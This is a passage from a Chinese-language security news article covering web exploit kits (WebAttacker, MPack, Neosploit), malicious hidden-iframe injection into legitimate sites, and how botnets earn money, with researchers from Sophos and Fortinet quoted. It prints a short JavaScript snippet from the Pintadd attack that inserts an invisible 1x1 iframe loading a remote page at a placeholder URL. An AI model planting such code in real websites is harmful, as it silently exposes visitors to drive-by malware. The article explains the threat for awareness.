WebAttacker一直备受黑客的喜爱，不过在2006年其新增了一些漏洞利用方法未能正常使用后，它逐渐被人们所放弃。几个月后，MPack和Neosploit先后问世，这两个工具集都增加了更好的加密，同时还增加了更频繁和准确的漏洞利用方法更新。

上一页  [1] [2] [3] [4] [5] 下一页

    三、借助子框架

　　尽管多数普通被感染网站欺骗用户的方法依然是简单的链接垃圾信息，不过仅仅依靠欺骗下载和含有恶意软件的色情网站的时代已经过去了。SophosLabs的首席病毒研究员Fraser Howard表示，“通过入侵合法网站，攻击者可以增加某些恶意代码，当用户简单的浏览网页时就可以被加载这些恶意程序。当目标网站具有非常大的用户群时，这个技术可能非常有效。”HTML提供了非常方便的方式来加载附加内容。

    
    用于入侵网站的最常见方法之一包括使用<IFRAME>标签，该方法可以用来悄然加载内容到网页中。Howard解释称，“在许多网站上该标签被广泛应用，iframe标签支持好几个属性。被恶意攻击者最经常使用的是它的width和Height属性，它们可以被用来控制该框架在页面中的大小。为了不让被攻击者发现，多数恶意子框架通常使用非常小的width/height数值。”

　　由于许多合法的Web页面也使用具有相同属性的iframe标签，对受感染网页的提前探测就非常关键。举例来说，Pintadd攻击借助于使用iframe技术加载远程恶意内容的一个脚本来入侵了许多网站，攻击者只是进行了一点细微的修改。

　　Howard表示，“该脚本并没有简单的使用‘document.write()’，而是使用了‘createElement()’方法来创建一个iframe元素，然后设置其属性，并使用‘appendChild()’方法来将其添加到当前页面中。”

　　var url=http://domain/path/index.php;
　　var ifr=document.createElement(iframe);
　　ifr.setAttribute(src,url);
　　ifr.frameBorder=0;
　　ifr.width=1;
　　ifr.height=1;
　　document.body.appendChild(ifr)

　　对于被攻击者来说，其最终效果与直接修改页面的iframe标签是完全一样的。对于安全产品来说，这是又一个需要克服的挑战。

上一页  [1] [2] [3] [4] [5] 下一页

    四、发展僵尸网络

　　病毒和恶意软件之间语义上的区别正在日渐模糊，病毒作者也已经逐渐转向追求经济利益。

    
    现在许多病毒的目标只是简单的修改HTML或PHP/ASP脚本，通常通过增加iframe标签作为感染过程的一部分。那么黑客如何通过病毒来获取金钱方面的收入？这个问题的答案有很多种，每个答案都基于能够使用命令及控制通道远程控制许多被感染的计算机（僵尸网络）。在你完成了传播过程后，任何现代病毒的主要功能就是通信通道。

　　Fortinet威胁响应团队负责人Guillaume谈论了一个僵尸网络的工作原理。“现在从僵尸到僵尸控制者的通信一般是经过加密的，命令及控制通道也各不相同。最初阶段一般是一个IRC通道，它可能是一个Webserver，一个即时通讯系统或一个特定协议。它可以是分布式的，例如诸如Storm之类的现代P2P僵尸网络。”一旦一个僵尸控制者控制了大量被感染的计算机，他可以命令它们来发送垃圾广告信息，或安装广告插件来获得收入。僵尸控制者还可以将它们作为TCP/IP代理，来向那些希望匿名的计算机犯罪分子或恐怖分子出租，这些人可能使用它们来发起分布式拒绝服务攻击（DDoS）。当然，僵尸控制者自然不会放过被感染计算机上任何能给他带来经济收入的数据信息，其中包括银行数据、密码和软件许可等。

上一页  [1] [2] [3] [4] [5]&nb

本文来源：天下网吧 作者：网吧方案